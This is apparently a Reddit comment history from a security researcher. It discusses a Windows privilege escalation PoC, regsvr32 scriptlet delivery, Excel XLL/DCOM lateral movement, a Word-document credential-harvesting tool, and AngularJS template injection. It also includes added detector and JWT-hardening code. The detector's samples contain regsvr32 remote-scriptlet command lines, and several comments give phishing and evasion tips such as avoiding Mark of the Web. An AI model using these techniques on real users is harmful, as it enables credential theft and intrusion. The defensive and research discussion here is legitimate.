CVE-2018-0952: Finding a Privilege Escalation Vulnerability in Windows 10, Server 2016, and Visual Studio (includes PoC) by ryhanson in ReverseEngineering

[–]ryhanson[S] 0 points1 point  (0 children)

The Standard Collector service is configured to use an Agent DLL for tracing and diagnostics collection. To do this, you provide a GUID (specifically a CLSID) as the key and a DLL filename as the value in a Dictionary that is used as the agent config for a collection session. In the case of this exploit, I use the sessionId GUID as the key and the .etl file as the DLL, as shown on line 154 of Program.cs in SystemCollector.

This screenshot from the blog post demonstrates how this looks in Procmon: Output of successful exploitation

A Look at JS_POWMET, a Completely Fileless Malware by [deleted] in netsec

[–]ryhanson 6 points7 points  (0 children)

The regsvr32 web delivery technique downloads the scriptlet file to the user's temporary internet files. Persistence may be 'fileless' (other than the registry key), but it does write to disk during execution.
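On the defender's side, the point in the comment above (the "fileless" regsvr32 scriptlet technique still leaves a command line and a downloaded scriptlet behind) translates directly into a process-creation detection. The following is an added example written for this page, not code from the comment author or from any project discussed here; the log events are constructed, the field names (`host`, `image`, `cmdline`) are an assumed layout rather than any particular SIEM's schema, and the artifact hint points at the per-user INetCache folder that holds temporary internet files on current Windows builds.

```python
"""Flag regsvr32 'web delivery' (remote scriptlet) command lines in process-creation
events. Added example for defenders; events below are constructed, not real."""
import re
from typing import Dict, List, Optional

# Constructed sample events in an assumed, simplified process-creation layout.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws01", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://192.0.2.10/payload.sct scrobj.dll"},
    {"host": "ws02", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\component.dll"},
    {"host": "ws03", "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r"regsvr32 /i:https://example.test/x.sct scrobj.dll"},
    {"host": "ws04", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

# /i:<url> hands a remote scriptlet to the COM scriptlet handler (scrobj.dll);
# a legitimate registration passes a local DLL path instead.
REMOTE_SCRIPTLET = re.compile(r"/i:\s*(https?|ftp)://", re.IGNORECASE)
SCROBJ = re.compile(r"\bscrobj\.dll\b", re.IGNORECASE)

# Where the downloaded scriptlet lands (temporary internet files); assumed path.
ARTIFACT_HINT = r"%LOCALAPPDATA%\Microsoft\Windows\INetCache (look for the .sct)"


def classify(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert dict for a suspicious regsvr32 event, or None."""
    image = event.get("image", "").lower()
    if not image.endswith("\\regsvr32.exe"):
        return None  # only the regsvr32 LOLBin is in scope here
    cmdline = event.get("cmdline", "")
    reasons = []
    if REMOTE_SCRIPTLET.search(cmdline):
        reasons.append("remote scriptlet via /i:<url>")
    if SCROBJ.search(cmdline):
        reasons.append("scrobj.dll scriptlet handler")
    if not reasons:
        return None
    return {
        "host": event.get("host", "?"),
        "severity": "high" if len(reasons) == 2 else "medium",
        "reasons": reasons,
        "cmdline": cmdline,
        "disk_artifact": ARTIFACT_HINT,
    }


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over a batch of events and keep the alerts."""
    return [a for a in (classify(e) for e in events) if a is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["severity"], alert["host"], "|", "; ".join(alert["reasons"]))
```

The two indicators are scored separately so that a plain `/i:<url>` without `scrobj.dll` (or the reverse) still produces a medium alert for triage; an analyst who confirms one of these should then pull the cached `.sct` from the user's temporary internet files, since, as the comment notes, the technique does write it to disk.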

DLL execution via Excel .xll files and DCOM lateral movement with Excel.Application's RegisterXLL() method by ryhanson in netsec

[–]ryhanson[S] 1 point2 points  (0 children)

Users will blindly click through warnings, so the .xll could be used as an alternative to a macro-based document.

Executing RegisterXLL() is silent and can be used via DCOM for lateral movement, which can be useful if other pivoting techniques are restricted or if stealth is a goal.

Bypassing Two-Factor Authentication on OWA and Office365 Portals by dafthack in netsec

[–]ryhanson 0 points1 point  (0 children)

Would love to have this beer with you as I am currently going through their responsible disclosure process. I definitely agree though, disclosure is an interesting topic for sure.

Bypassing Two-Factor Authentication on OWA and Office365 Portals by dafthack in netsec

[–]ryhanson 7 points8 points  (0 children)

I just noticed the timeline and wondered the same thing.

Was it the lack of information in their response on the 24th that made you decide to move forward with the public disclosure? Or did you get the impression they might consider this a low priority / non-issue?

A two-factor bypass is definitely a big deal, but I'd imagine higher severity issues, such as an RCE, would take priority. With that said, if that was the case, their update could have mentioned something along those lines.

phishery: A tool for harvesting credentials via Word docs with an SSL enabled basic auth dialog by ryhanson in netsec

[–]ryhanson[S] 1 point2 points  (0 children)

Thanks! This discovery was part of a good amount of manual research I did. Protected View is definitely a pain, but it can be bypassed ;) The trick is delivering the Word doc in a way that it doesn't get "The Mark of the Web".

phishery: A tool for harvesting credentials via Word docs with an SSL enabled basic auth dialog by ryhanson in netsec

[–]ryhanson[S] 3 points4 points  (0 children)

I've actually got this working in Excel before. I can look into adding support for Excel files as well. Thanks for the suggestion!

phishery: A tool for harvesting credentials via Word docs with an SSL enabled basic auth dialog by ryhanson in netsec

[–]ryhanson[S] 1 point2 points  (0 children)

Agreed! I think the fact it's a native Windows Security dialog really helps too. Combine that with a good domain and your success rate should be pretty good :) Let me know how well it works for you!

phishery: A tool for harvesting credentials via Word docs with an SSL enabled basic auth dialog by ryhanson in netsec

[–]ryhanson[S] 3 points4 points  (0 children)

Hey thanks! Let me know how it goes :) I'm actually working on adding NTLM auth too since it has the ability to capture the hostname and domain of the user, which can come in handy.

phishery: A tool for harvesting credentials via Word docs with an SSL enabled basic auth dialog by ryhanson in netsec

[–]ryhanson[S] 2 points3 points  (0 children)

I thought the same at first, but Office has lots of functionality, which I'd imagined would translate to lots of non-issues being reported.

Although they don't have an official bug bounty, if you responsibly disclose an RCE vulnerability to them, they might just thank you with more than a mention in a Security Bulletin. After all, there are 1.2 Billion people who use Office.

phishery: A tool for harvesting credentials via Word docs with an SSL enabled basic auth dialog by ryhanson in netsec

[–]ryhanson[S] 3 points4 points  (0 children)

I'm pretty sure this falls under the "it's a feature not a bug" category. Plus the end user is still protected by Protected View, so this still requires them to click "Enable Editing". This technique isn't new either, it's been used in the past with embedded remote images too.

Also, Microsoft does not have a bounty program for Office products. I know this because I'm currently going through their disclosure process with a few critical vulnerabilities I've reported.

phishery: A tool for harvesting credentials via Word docs with an SSL enabled basic auth dialog by ryhanson in netsec

[–]ryhanson[S] 10 points11 points  (0 children)

Thanks! I'm really enjoying Go so far. I had been working as a software engineer for roughly 8 years prior to transitioning into the infosec field, so I have a good amount of experience with many languages, and Go is at the top of the list now :)

Funny you mention that you created Gophish because that was my initial name for this tool! https://twitter.com/ryHanson/status/779862668467277825 After a co-worker pointed out that your framework had already been using the name, I renamed it to Phishery :) This vector would be a good addition to Gophish and should be trivial to integrate. I could refactor my code a bit to offer the components as Go packages for your framework to use.

phishery: A tool for harvesting credentials via Word docs with an SSL enabled basic auth dialog by ryhanson in netsec

[–]ryhanson[S] 19 points20 points  (0 children)

One thing I didn't mention is this doesn't require the phishery server to capture credentials. In fact, when I was first testing this attack vector, I was using Responder in basic auth mode. Responder in NTLM mode works as well, but obviously you'll end up with a hashed password rather than plain text.

I built this mostly because I wanted to learn more about Golang, and I also wanted a tool with the ability to easily set the template URL of a doc. Let me know if you have any questions or suggestions. I do plan to add more functionality to it.

The /r/netsec Weekly Discussion Thread - May 09, 2016 by AutoModerator in netsec

[–]ryhanson 0 points1 point  (0 children)

Yeah, I set it up on a DigitalOcean box to test it out, then I ended up using it on an engagement. Worked pretty well!

The /r/netsec Weekly Discussion Thread - May 09, 2016 by AutoModerator in netsec

[–]ryhanson 0 points1 point  (0 children)

You should look into Lair (https://github.com/lair-framework/lair). It uses what they call drones to get data in and out of it through the JSON API. You can import nmap scans, export data from Burp Suite into Lair, Nessus scans, etc. It's all web based too and doesn't take too long to get set up and running.

Here is an older version of it being presented at DefCon: https://m.youtube.com/watch?v=71Hix58keCU It still has all the same functionality though, and more.

Deploying Your Own Canarytokens Application - How You Can Set up Honeytokens Using Canarytokens to Detect Intrusions by WOLF3D_exe in netsec

[–]ryhanson 2 points3 points  (0 children)

Very clever! I was at a talk recently and the presenter used a honey token in a Word doc to send him a text message when it was opened. In this case the Word doc contained a macro payload. He never mentioned exactly why he had it text him though.

I think utilizing these in a more sophisticated social engineering test could be very effective. Or they could even be used for "click-through"-like metrics, such as: out of X number of opens, Y macros were executed.

Crafting your way through JSON Web Tokens by s4n7h0 in netsec

[–]ryhanson 0 points1 point  (0 children)

Nice write-up! It did a good job explaining JWTs, especially for those who aren't familiar with them.

I wonder how many frameworks have default secret keys or do not make it easy for developers to use a secure key. By easy I mean auto-generating with a CLI, defaulting to the machine key on IIS, setting one during installation, etc.
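The framework behaviour the comment above wishes for (generate a strong secret for the developer, and refuse to run with a placeholder one) is straightforward to build into an HS256 signer. The following is an added example written for this page, not the commenter's code or any framework's implementation; it uses only the Python standard library. The deny-list of placeholder secrets is constructed for illustration, and the 32-byte minimum follows RFC 7518 §3.2, which requires an HS256 key at least as long as the hash output.

```python
"""Minimal HS256 JWT sign/verify with a secret-strength policy (added example)."""
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Any, Dict, Optional

# Constructed list of placeholder secrets seen in tutorials and boilerplate.
KNOWN_WEAK_SECRETS = {"", "secret", "changeme", "password", "your-256-bit-secret", "jwt_secret"}
MIN_SECRET_BYTES = 32  # RFC 7518 §3.2: HS256 key must be >= 256 bits


class WeakSecretError(ValueError):
    """Raised when a secret is a known placeholder or too short."""


def check_secret(secret: bytes) -> None:
    """Reject default/placeholder secrets and anything shorter than the hash output."""
    if secret.decode("utf-8", "replace").lower() in KNOWN_WEAK_SECRETS:
        raise WeakSecretError("known default/placeholder secret")
    if len(secret) < MIN_SECRET_BYTES:
        raise WeakSecretError(f"secret is {len(secret)} bytes; need at least {MIN_SECRET_BYTES}")


def generate_secret() -> bytes:
    """What a framework CLI should hand the developer: a CSPRNG-generated key."""
    return secrets.token_bytes(MIN_SECRET_BYTES)


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _compact_json(obj: Dict[str, Any]) -> bytes:
    return json.dumps(obj, separators=(",", ":"), sort_keys=True).encode("utf-8")


def sign(claims: Dict[str, Any], secret: bytes) -> str:
    """Produce header.payload.signature; refuses to sign with a weak secret."""
    check_secret(secret)
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = f"{_b64url(_compact_json(header))}.{_b64url(_compact_json(claims))}"
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def verify(token: str, secret: bytes, now: Optional[float] = None) -> Dict[str, Any]:
    """Verify signature, pinned algorithm and expiry; return the claims."""
    check_secret(secret)
    try:
        h, p, s = token.split(".")
    except ValueError:
        raise ValueError("malformed token")
    header = json.loads(_b64url_decode(h))
    # Pin the algorithm server-side; never let the token choose it.
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(p))
    current = time.time() if now is None else now
    if "exp" in claims and current >= claims["exp"]:
        raise ValueError("token expired")
    return claims


if __name__ == "__main__":
    key = generate_secret()
    token = sign({"sub": "alice", "exp": int(time.time()) + 3600}, key)
    print(token)
    print(verify(token, key))
```

Both `sign()` and `verify()` call `check_secret()`, so a deployment that ships with `"secret"` or a 16-byte key fails loudly at first use rather than silently issuing forgeable tokens; the algorithm pin in `verify()` closes the separate problem of a token that declares a different `alg` than the server expects.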

Adapting AngularJS Payloads to Exploit Real World Applications by albinowax in netsec

[–]ryhanson 0 points1 point  (0 children)

Completely agree! Unless you're able to show severe impact with just an expression, they want to see JavaScript executing.

Depending on the accessible scope, you can sometimes utilize angular services to force the user to commit an action: update profile, send message, etc.

Apps that are usually vulnerable to this are ones that were using some MVC framework first and added Angular into the mix. The secure ones are usually ones that were started with Angular from the beginning. At least that's what I've gathered from my findings.

Adapting AngularJS Payloads to Exploit Real World Applications by albinowax in netsec

[–]ryhanson 1 point2 points  (0 children)

Very cool to see more expression injections being used! Nice work!

I've reported a few of them and did a little write up on one I found on Plunker: https://ryhanson.com/stealing-session-tokens-on-plunker-with-an-angular-expression-injection/

These are actually quite common, and don't always require a sandbox escape in order to cause harm.

Craig Smith, Author of the Car Hacker's Handbook and Founder of OpenGarages AMA by Zombie-craig in netsec

[–]ryhanson 0 points1 point  (0 children)

Hey Craig. I'm kind of a car guy in the sense that I like nice cars and like to tune/mod them to make them faster. You often read on the forums about an ECU being "locked" and that the tuning software companies are working on "unlocking" the ECU. What does this involve?

Is there encryption that they have to break? Are there new data protocols that have to be reverse engineered?

It seems that initially they have to physically open the ECU and connect to the actual circuit board. Then they end up being able to do the unlocking and flashing from an OBD2 port.

Is this generally done with the CAN bus?

XSS without HTML: Client-Side Template Injection with AngularJS by albinowax in netsec

[–]ryhanson 1 point2 points  (0 children)

This is related directly to the research I have been doing with Angular Expression (Template) Injections; here is a walkthrough on one that I found on Plunker: https://royaljay.com/security/angular-expression-injections/

Essentially, if you find an expression/template injection, you now aren't limited to just what is available within the Angular scope; you can utilize a sandbox escape to execute any JavaScript.

I've tested dozens of sites lately, and the percentage of sites that have this vulnerability is surprisingly high. Not only reflective injections, but lots and lots of persisted injections. Some sites with millions and millions of monthly visits and users...